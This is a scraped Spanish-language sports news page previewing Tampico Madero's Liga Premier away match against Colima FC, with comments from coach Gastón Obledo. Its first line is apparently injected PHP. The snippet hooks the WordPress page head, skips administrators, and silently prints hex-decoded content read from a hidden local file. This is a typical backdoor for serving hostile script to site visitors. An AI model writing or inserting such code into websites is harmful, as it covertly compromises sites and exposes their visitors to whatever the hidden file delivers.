if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } «Ser protagonistas, con la humildad por delante» – Reporte Noreste
Conéctate con nosotros

Deportes

«Ser protagonistas, con la humildad por delante»

«Ser protagonistas, con la humildad por delante»

Los objetivos son claros para Gastón Obledo, destacando el mantener la buena racha y ante Colima FC no será la excepción.

Con la mejor defensiva y 4 triunfos a la cuenta, es como el Club Deportivoy Social Tampico Madero encara la Jornada 05 de la Liga Premier del Fútbol Mexicano.

El equipo de la Zona Sur de Tamaulipas ha sido protagonista en la categoría desde su debut, y conscientes del compromiso que representa, viajan a Tierras Colimenses decididos por otros 4 puntos que los mantenga en lo alto de la clasificación.

El Jueves por la mañana en el Estadio Tamaulipas, culminó la preparación del equipo celeste para lo que será el partido de este Sábado 17 de Septiembre cuando visite a los Caimanes de Colima en punto de las 16:00 horas.

«Confiar en lo que se esta trabajando y desconfiar del compañero para poder ayudarlo»; y que pesar de que siempre exista algo por corregir, Obledo reconoció el progreso que el equipo Jaibo ha alcanzado, habiendo disputado ya casi la mitad de la temporada regular.

Fueron algunas de las declaraciones que el Director Técnico Jaibo compartió ante los medios de comunicación posterior a la sesión de entrenamiento.
Inculcados con el valor de la humildad, los jugadores del Club Deportivo y Social Tampico Madero caminan paso a paso para llegar a la fiesta grande, así lo compartió el Mediocampista Omar Vidaña, habiendo disputado hasta el momento 286 minutos de juego y 2 anotaciones a la cuenta. Por su parte, los anfitriones de este cotejo, Colima FC, vienen de una pausa en la actividad como lo marca el calendario. Sumando 4 unidades y esperanzados por coincidir con el que
sería apenas su segunda victoria del Torneo

Haga clic para comentar

Leave a Reply

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Facebook

Principales

Más en Deportes